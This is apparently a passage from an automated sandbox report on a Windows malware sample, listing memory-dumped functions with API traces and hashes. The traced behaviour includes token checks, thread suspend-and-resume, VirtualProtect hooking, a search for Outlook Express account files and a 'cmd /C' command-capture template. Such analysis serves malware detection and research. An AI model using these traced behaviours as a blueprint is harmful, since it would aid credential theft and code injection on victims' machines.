  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB4E6, Relevance: 6.1, APIs: 4, Instructions: 57 Total matches: 46sleep
Similarity
  • Total matches: 46
  • API ID: RtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleep
  • String ID:
  • API String ID: 522987270-0
  • Opcode ID: 8cc2b4e76e7c6786e8c4d2b22bf8b4b6a679c49f941b40daf46a87d1c8b23fb6
  • Instruction ID: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
  • Opcode Fuzzy Hash: 1BE0DF31184C8ACB405B38B05C420B38FA9EB522D184CDF63DC00A216CBA63316F5EAB
  • Instruction Fuzzy Hash: 1e3edd6de38308fdc5cd11c9fcbd00204bafdbd531665641dfe8eb1a79e4ebb8
APIs
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
  • Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
  • Instruction ID: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
  • Opcode Fuzzy Hash: 67D02714050602D5143B4125871073D4D05F4727D764D03D7EE057F40B6F4377D1453B
  • Instruction Fuzzy Hash: aa0ee88ceabb3cfce0bb27174555043f10b3b389693c421934e6cd8c85edd5db
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C2567
  • lstrlen.KERNEL32(001EAF98), ref: 001C2588
  • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C25A0
  • lstrcpy.KERNEL32(00000000,001EAF98), ref: 001C25B2
    • Part of subcall function 001D7438: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,00000000,001C25BE,00000000), ref: 001D744D
    • Part of subcall function 001D7438: GetLastError.KERNEL32 ref: 001D7457
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2884, Relevance: 6.0, APIs: 4, Instructions: 41 Total matches: 66filestringsynchronization
Similarity
  • Total matches: 66
  • API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat
  • String ID:
  • API String ID: 1450029813-0
  • Opcode ID: 8e9c4f27ea08848543a801e9cdb05178d747e0c7379010af42e4ca9c2a234582
  • Instruction ID: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
  • Opcode Fuzzy Hash: D2D05E79C125829AD467AA64110037BE80B5B532D0E6C0226F854A262E4B92B0FC7F49
  • Instruction Fuzzy Hash: ad607d2a3cf5ae0ffcc910d61a1da497d4bb574f382d44c89ab1414e297e3fef
APIs
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
  • GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDF8E, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 105memorythread
Similarity
  • Total matches: 105
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFree
  • String ID:
  • API String ID: 3959641148-0
  • Opcode ID: 17db151a2367aa19797f4857625e82bd580b03901d77089577393fa024a02921
  • Instruction ID: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
  • Opcode Fuzzy Hash: 1CC022700704198A8007A832899536A9B14A6C00C448C00ABBA40B012B2A0231EBAF86
  • Instruction Fuzzy Hash: 81e2dfd9d50da0d6d7b205c0d61b31ea22f37f90d979ff24ffd585a246fd44ab
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • CreateThread.KERNEL32(00000000,00000000,001CDEFA,00000000,00000000,00000000), ref: 001CDFB2
  • CloseHandle.KERNEL32(00000000), ref: 001CDFBD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CDFCD
  • GetLastError.KERNEL32(?,001C4B89,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001CDFD3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B329FB, Relevance: 6.0, APIs: 4, Instructions: 38 Total matches: 305
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
  • Opcode ID: 524f9a7b75de6261c385ad020a1fd97dd94a45c24a600229a4b30a1cd107f5d7
  • Instruction ID: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
  • Opcode Fuzzy Hash: A0D0A9450DCCD2E2AA2A0C8B0C0C2200682ECB7B42C2C220435D01490DC3D1FEB0BF08
  • Instruction Fuzzy Hash: a85b326790d171c0c988a59854742bd5cd24d1e6bf1bfe6e4cf1ac49bb4aabbd
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,01B37494,01B31728,?,01B37494), ref: 01B32A0A
  • GetVersion.KERNEL32(?,01B37494), ref: 01B32A19
  • GetCurrentProcessId.KERNEL32(?,01B37494), ref: 01B32A30
  • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,01B37494), ref: 01B32A49
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD61D, Relevance: 6.0, APIs: 4, Instructions: 29 Total matches: 151sleepmemory
Similarity
  • Total matches: 151
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep
  • String ID:
  • API String ID: 1512377870-0
  • Opcode ID: 16b51c5752f63ceec2f2a3999784c98dd23d7905f2455a362739d2d7a92f53ef
  • Instruction ID: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
  • Opcode Fuzzy Hash: E9C01273359991D2564D34E106E53AF8C49F8D67E001E5A43E6043544B6F4152E57F3E
  • Instruction Fuzzy Hash: 1d27c4380d4d96c47a2b585013a31a24f663d64f861164ec6c1989bc1a589175
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD626
  • Sleep.KERNEL32(0000000A,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001DD630
  • HeapFree.KERNEL32(00000000,001EB218), ref: 001DD658
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001D9963
    • Part of subcall function 001D992A: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9980
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD674
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA895, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: RtlAllocateHeaplstrcpy
  • String ID: http
  • API String ID: 1742432113-2541227442
  • Opcode ID: 2c65e63afd727239392329a5dc8ec7dad85dd519dd139d15832cb51e86589f08
  • Instruction ID: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
  • Opcode Fuzzy Hash: D501902A0149C24BD05B301680AA774D61EBFA15E6C8D1367EC8AFA15F2D8363562B1D
  • Instruction Fuzzy Hash: b05e35adc5d908b88caf2a621ed8829b3f227badc6d55ac4b3d9b4ade867fe51
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001CA8C4
  • lstrcpy.KERNEL32(00000000,?), ref: 001CA8DE
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001C9D54: RegCreateKeyA.ADVAPI32(80000001,?), ref: 001C9DC7
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9E08
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C9D54: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7222, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58 Total matches: 58
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C77DE, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46 Total matches: 59
Similarity
  • Total matches: 59
